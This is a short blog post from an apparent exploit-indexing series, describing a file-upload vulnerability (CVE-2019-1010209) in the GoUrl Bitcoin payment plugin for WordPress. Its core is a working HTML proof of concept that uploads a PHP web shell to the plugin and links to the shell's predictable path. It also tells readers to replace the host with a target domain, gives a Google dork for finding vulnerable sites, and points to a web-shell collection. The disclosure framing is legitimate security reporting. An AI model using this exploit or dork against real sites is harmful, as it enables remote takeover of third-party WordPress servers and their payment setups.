GoUrl Bitcoin/Altcoin Payment Gateway file upload

A file upload vulnerability has been found affecting a crypto currency payment gateway

Go Url

Summary:

Today’s exploit of the day is one affecting a popular wordpress plugin
that enables anyone to accept Bitcoin and several other crypto currencies. The library is a client for the site GoUrl.io

Affecting:

Wordpress instances running the Gourl plugin with a version past 1.4.14.

Link to wordpress plugin

Proof of concept

<html>
<body>

    <form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">

        <input type="file" name="gourlimage2" />
        <input type="submit"/>
        
    </form>

    <a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>

</body>

</html>

Source gist

All that is needed is that you replace 127.0.0.1 with your domain
and pick a php web shell to upload.

Google dork

inurl:“uploads/gourl/images/”

External links:
CVE-2019-1010209
GoUrl Bitcoin Payment Gateway 1.4.14 - Shell Upload
Collection of web shells
Plugin url
GoUrl.io

Stay up to date with Vulnerability Management and build cool things with our API

This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.